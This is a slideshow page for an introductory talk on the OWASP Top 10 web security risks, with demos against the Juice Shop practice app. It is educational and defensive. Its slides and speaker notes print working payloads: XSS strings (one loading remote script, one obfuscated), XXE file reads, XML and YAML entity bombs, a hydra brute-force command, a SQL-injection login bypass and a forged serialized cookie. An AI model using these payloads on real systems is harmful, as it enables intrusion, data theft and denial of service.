Successfully reported this slideshow.

OWASP TOP 10

0

Share

1 of 38
1 of 38

OWASP TOP 10

0

Share

Download to read offline

The OWASP top 10 is a list of the most prolific security issues facing web developers today. In this talk, Robert, will take you through all 10 and demonstrate the problems (we will hack for real… in a safe way) and talk about the solutions. This is an introductory talk, so no prior experience is needed in web dev or security. Not doing web dev? Many of these apply to all development! So join in for a lively session of demos, learning and fun

Video of this talk: https://www.youtube.com/watch?v=p5YCHNnQNyg

The OWASP top 10 is a list of the most prolific security issues facing web developers today. In this talk, Robert, will take you through all 10 and demonstrate the problems (we will hack for real… in a safe way) and talk about the solutions. This is an introductory talk, so no prior experience is needed in web dev or security. Not doing web dev? Many of these apply to all development! So join in for a lively session of demos, learning and fun

Video of this talk: https://www.youtube.com/watch?v=p5YCHNnQNyg

More Related Content

Related Books

Free with a 14 day trial from Scribd

See all

OWASP TOP 10

  1. 1. OWASP TOP 10 Setting the bar for security
  2. 2. 2 Hi Robert MacLean @rmaclean | sadev.co.za DevConf | DevUG | Equal Experts Cape Town | South Africa
  3. 3. 3 Mandatoryhackerphoto
  4. 4. Content warning Do not try this at home. Hacking is illegal without permission. One demo contains F*** 4
  5. 5. What is OWASP? Non-profit foundation for the improvement of security of software Join as a member to support them and get conference discounts Local meetups available Cape Town: meetup.com/en-AU/OWASP-Cape-Town- Chapter-Meetup Produce tools: Zap, Dependency Scanner Guidance 5
  6. 6. OWASPTOP 10 Using the 2017 guidance as 2020 guidance is still underway As it evolves, items are added, merged and removed This is the bar for security Focused on web security but a lot is broadly applicable 10 areas which can be implemented and exploited in a variety of ways Based on real world feedback from OWASP members See: owasp.org/www-project-top-ten Each scored on 4 axis (scale is 1 to 3): Attack Vector: Exploitability Security Weakness: Prevalence Security Weakness: Detectability Impact: Technical 6
  7. 7. OWASPTOP 10 1. Injection 2. Broken Authentication 3. Sensitive Data Exposure 4. XML External Entities (XXE) 5. Broken Access Control 6. Security Misconfiguration 7. Cross-Site Scripting (XSS) 8. Insecure Deserialization 9. Using Components with Known Vulnerabilities 10.Insufficient Logging & Monitoring 7
  8. 8. Ten: Insufficient Logging & Monitoring Not logging and auditing logins, fails, high-value transactions Not enough information Locally stored Logs disabled or configured to ignore pen tests Not alerting on logs & metrics 8 Exploitability: 2 Prevalence: 3 Detectability: 1 Technical: 2
  9. 9. Nine: Using Components with KnownVulnerabilities 3rd party code runs in same permissions as the system OS, database etc… all need to be checked too Scan on a continuous basis • Library tools like dependency check and npm audit • Container scanning • OS patching Only obtain code from official sources 9 Exploitability: 2 Prevalence: 3 Detectability: 2 Technical: 2
  10. 10. Eight: Insecure Deserialization A specially crafted data structure causes the execution of code Focused on any time you use serialisation 10 Exploitability: 1 Prevalence: 2 Detectability: 2 Technical: 3
  11. 11. Demo 11
  12. 12. Eight: Insecure Deserialization User input should not be trusted Don’t accept serialised data • If you must, encrypt and/or sign the payloads Use safe deserialization options 12
  13. 13. Seven: Cross-Site Scripting (XSS) Reflected XSS: Not validating input & returning it back to the user Stored XSS: Not validating input, putting it in the DB and then raising it later DOM XSS: APIs sending attackable content to the UI Can lead to account take overs, spam, multi-factor bypasses, key logging 13 Exploitability: 3 Prevalence: 3 Detectability: 3 Technical: 2
  14. 14. Demo 14
  15. 15. Demos <script>alert(`xss`)</script> <iframe src="javascript:alert(`xss`)"> <<a|ascript>alert(`xss`)</script> <SCRIPT/XSS SRC="http://ha.ckers.org/xss.js"></SCRIPT> /*iframe/src*/<iframe/src="<iframe/src=@"/onload=prompt(1) /*iframe/src*/> &lt;SCRIPT&gt;alert("XSS");&lt;/SCRIPT&gt; 15 _=`${`${{}}`[!![]<<!![]<<!![]|!![]]}${`${{}}`[!!{}<<![]]}${`${[][~[]]}`[!!{}<<![]]}${`${!![][~[]]}`[(!![]< <!![])|!![]]}${`${![][~[]]}`[!{}<<![]]}${`${![][~[]]}`[!!{}<<![]]}${`${![][~[]]}`[!!{}<<!![]]}${`${{}}`[!! []<<!![]<<!![]|!![]]}${`${![][~[]]}`[!{}<<![]]}${`${{}}`[!!{}<<![]]}${`${![][~[]]}`[!!{}<<![]]}`,__=`${`${ {}}`[!!{}<<![]]}${`${{}}`[!!{}<<!![]]}${`${!![][~[]]}`[[]<<[]]}${`${![][~[]]}`[!!{}<<!![]]}${`${!![][~[]]} `[(!![]<<!![])|!![]]}${`${{}}`[!![]<<!![]<<!![]|!![]]}${`${!![][~[]]}`[!!{}<<![]]}${`${![][~[]]}`[!{}<<![] ]}${`${[][~[]]}`[!![]<<!![]<<!![]|!![]]}${`${{}}`[!!{}<<![]]}${`${[][~[]]}`[!!{}<<![]]}!`,[][_][_](`${`${{ }}`[!![]<<!![]<<!![]|!![]]}${`${{}}`[!!{}<<![]]}${`${[][~[]]}`[!!{}<<![]]}${`${!![][~[]]}`[(!![]<<!![])|!! []]}${`${{}}`[!!{}<<![]]}${`${!![][~[]]}`[!!{}<<!![]]}${`${![][~[]]}`[(!![]<<!![])|!![]]}${`${{}}`[[]<<[]] }'${`${!![][~[]]}`[!!{}<<!![]]}${`${{}}`[!!{}<<![]]}${`${``[_]}`[!![]<<!![]<<!![]<<!![]^!![]<<!![]<<!![]|! !{}<<!![]]}'${`${{}}`[!![]<<!![]<<!![]<<!![]^!![]<<!![]<<!![]|!!{}<<!![]]}(__)`)()
  16. 16. Seven: Cross-Site Scripting (XSS) User input should not be trusted HTML escape any dynamic content (tags, attribute, css etc..) Use a safer format for input, say markdown Make use of HTTPOnly cookies Make use of CORS Make use of CSP Make use of audit tools 16
  17. 17. Six: Security Misconfiguration Unused ports and services running on machines Default credentials Error handling returning too much info Using code with known issues 17 Exploitability: 3 Prevalence: 3 Detectability: 3 Technical: 2
  18. 18. Demo 18
  19. 19. Six: Security Misconfiguration User input should not be trusted Get security audits done Go on security training Automate checking of settings and code Remove (or block) anything not needed 19
  20. 20. Five: Broken Access Control Authentication vs. Authorization Bypassing access by edit URL or anything on the client side IDORs 20 Exploitability: 2 Prevalence: 2 Detectability: 2 Technical: 3
  21. 21. Demo 21
  22. 22. Five: Broken Access Control User input should not be trusted Deny by default Rate limits Disable web server directory listing 22
  23. 23. Four: XML External Entities (XXE) Untrusted XML is provided • SAML auth The XML parser has lots of features and those features are exploited 23 Exploitability: 2 Prevalence: 2 Detectability: 3 Technical: 3
  24. 24. Demos <?xml version="1.0" encoding="ISO-8859-1"?> <!DOCTYPE foo [ <!ELEMENT foo ANY > <!ENTITY xxe SYSTEM "file:///etc/passwd" >]> <foo>&xxe;</foo> 24 <?xml version="1.0"?> <!DOCTYPE lolz [ <!ENTITY lol "lol"> <!ELEMENT lolz (#PCDATA)> <!ENTITY lol1 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;"> <!ENTITY lol2 "&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;"> <!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;"> <!ENTITY lol4 "&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;"> <!ENTITY lol5 "&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;"> <!ENTITY lol6 "&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;"> <!ENTITY lol7 "&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;"> <!ENTITY lol8 "&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;"> <!ENTITY lol9 "&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;"> ]> <lolz>&lol9;</lolz>
  25. 25. Demos 25 a: &a ["lol","lol","lol","lol","lol","lol","lol","lol","lol"] b: &b [*a,*a,*a,*a,*a,*a,*a,*a,*a] c: &c [*b,*b,*b,*b,*b,*b,*b,*b,*b] d: &d [*c,*c,*c,*c,*c,*c,*c,*c,*c] e: &e [*d,*d,*d,*d,*d,*d,*d,*d,*d] f: &f [*e,*e,*e,*e,*e,*e,*e,*e,*e] g: &g [*f,*f,*f,*f,*f,*f,*f,*f,*f] h: &h [*g,*g,*g,*g,*g,*g,*g,*g,*g] i: &i [*h,*h,*h,*h,*h,*h,*h,*h,*h] 100 1000 10 000 100 000 1 000 000 10 000 000 100 000 000 1 BILLION
  26. 26. Four: XML External Entities (XXE) User input should not be trusted Run static code analysis tools Run dependency analysis tools • NPM & Yarn Audit • Dependency Check for JVM Disable SOAP prior to 1.2 Disable features you do not need • XML external entities & DTD in XML 26
  27. 27. Three: Sensitive Data Exposure Man-in-the-middle attacks Stealing records off the server or servers it was sent through Weak crypto No hashing on the passwords Sharing data which should be private 27 Exploitability: 2 Prevalence: 3 Detectability: 2 Technical: 3
  28. 28. Demo 28
  29. 29. Three: Sensitive Data Exposure Classify data processed, stored and transmitted. Identify risk for business, law (GDPR) Only store information you must Encrypt sensitive data at rest Encrypt all data in transit Disable caching of sensitive data HSTS Preload 29
  30. 30. Two: Broken Auth Default admin accounts Credential Stuffing, brute force and dictionary attacks Unexpired session tokens Weak or ineffective forgot password and recovery processes Plaintext passwords, not hashed passwords Not invalidating session IDs 30 Exploitability: 3 Prevalence: 2 Detectability: 2 Technical: 3
  31. 31. Demo 31
  32. 32. Demos $ hydra -l admin@juice-sh.op -P /usr/share/wordlists/rockyou.txt 127.0.0.1 http-post-form '/#/login:email=^USER^&password=^PASS^:Invalid email or password.’ -fV -s 3000 -t 1 32
  33. 33. Two: Broken Auth Do not build auth unless needed – make use of the existing team Credential Stuffing, brute force and dictionary attacks • haveibeenpwned.com/Passwords • Rate limits Unexpired session tokens Weak or ineffective forgot password and recovery processes • Avoid knowledge questions • Do users need passwords • Two factor auth Plaintext passwords • Just don’t Hash & salt passwords • Pick hashing algorithms which are slow and don’t have collisions 33
  34. 34. One: Injection Attacker sends data to the interpreter to get it to return the incorrect answer, change settings they shouldn’t be able to or increase privileges SQL Injection is a vector, but this could be any database, environmental variables, JSON, SOAP, XML, headers, cookies, etc… 34 Exploitability: 3 Prevalence: 2 Detectability: 3 Technical: 3
  35. 35. Demo 35
  36. 36. One: Injection User input should not be trusted Use SQL parameters for SQL Avoid building strings in code based on user input Use approval lists to check content “I use an ORM, so I am safe” – By default, most likely but you should check Use tools like ZAP to look for these 36
  37. 37. Done? No, this is the minimum bar Join your local OWASP group Run your checks all the time Get a red team Practice incidents Secure by default is a great first principal 37
  38. 38. Thank You Robert MacLean robert@sadev.co.za

Editor's Notes

  • Photo by Francois Hoang on Unsplash
  • Photo by Andrew Haimerl on Unsplash
  • Photo by Luther Bottrill on Unsplash
  • Photo by Emre Karataş on Unsplash
  • Photo by Levon Vardanyan on Unsplash
  • Photo by Austrian National Library on Unsplash
  • http://www.appsensor.org/
  • Leonard H. Courtney \ Lies — damned lies — and statistics \ The price of peace is eternal vigilance

  • A PHP forum uses PHP object serialization to save a “super” cookie, containing the user’s user ID, role, password hash, and other state: a:4:{i:0;i:132;i:1;s:7:"Mallory";i:2;s:4:"user"; i:3;s:32:"b6a8b3bea87fe0e05022f8f3c88bc960";} An attacker changes the serialized object to give themselves admin privileges: a:4:{i:0;i:1;i:1;s:5:"Alice";i:2;s:5:"admin"; i:3;s:32:"b6a8b3bea87fe0e05022f8f3c88bc960";}
  • Photo by Denny Ryanto on Unsplash

    https://juice-shop.herokuapp.com/api-docs/

    {
    "cid": "JS0815DE",
    "orderLines": [{
    "product": "(function dos() { while(true); })()"
    }]
    }

    var x = 'var y = {"name":(function hi() { console.log(1) })()}’

    JSON.parse(x)
    eval(x)
  • Photo by kevin laminto on Unsplash

    Talk about alert
    Try search for <script>alert(“1”)</script>
    Show network tab is filtering it out… smart
    <iframe src="javascript:alert(`xss`)">
  • https://github.com/ihebski/XSS-Payloads
    http://www.jsfuck.com/
  • Directory listing is not disabled on the server. An attacker discovers they can simply list directories. The attacker finds and downloads the compiled Java classes, which they decompile and reverse engineer to view the code. The attacker then finds a serious access control flaw in the application.
  • Photo by JJ Ying on Unsplash

    https://obscure-chamber-62037.herokuapp.com/#/deluxe-membership
  • Photo by Victor Li on Unsplash

    Just go to https://juice-shop.herokuapp.com/ftp
    Tell story about query param for user ID
  • Photo by Oleksandr Zhabin on Unsplash

    https://juice-shop.herokuapp.com/admin#/saved-payment-methods

    Show how credit card number is in network tab
  • Photo credit https://www.flickr.com/photos/bookcatalog/27162728588
  • Photo by Alexander Popov on Unsplash

    bjoern@juice-sh.op & West-2082

    https://juice-shop.herokuapp.com/admin#/forgot-password
  • https://tools.kali.org/password-attacks/hydra

    rockyou.txt contains 14,341,564 unique passwords, used in 32,603,388 accounts.

    https://www.kaggle.com/wjburns/common-password-list-rockyoutxt
  • Photo by Levon Vardanyan on Unsplash

    https://juice-shop.herokuapp.com/#/
    Make sure to open network diagnostic
    Try quote for email and show error
    Talk about limiting errors back to users
    Then use a single quote for the email
    1' OR '1=1' --
    SELECT * FROM Users WHERE email = '1' OR '1=1' -- AND password = 'a8f5f167f44f4964e6c998dee827110c' AND deletedAt IS NULL
  • https://mybroadband.co.za/news/security/179064-ethekwini-municipality-leaking-private-details-of-over-300000-residents.html
  • Photo by Victor Rodriguez on Unsplash

  • Photo by Jonathan Formento on Unsplash
  • ×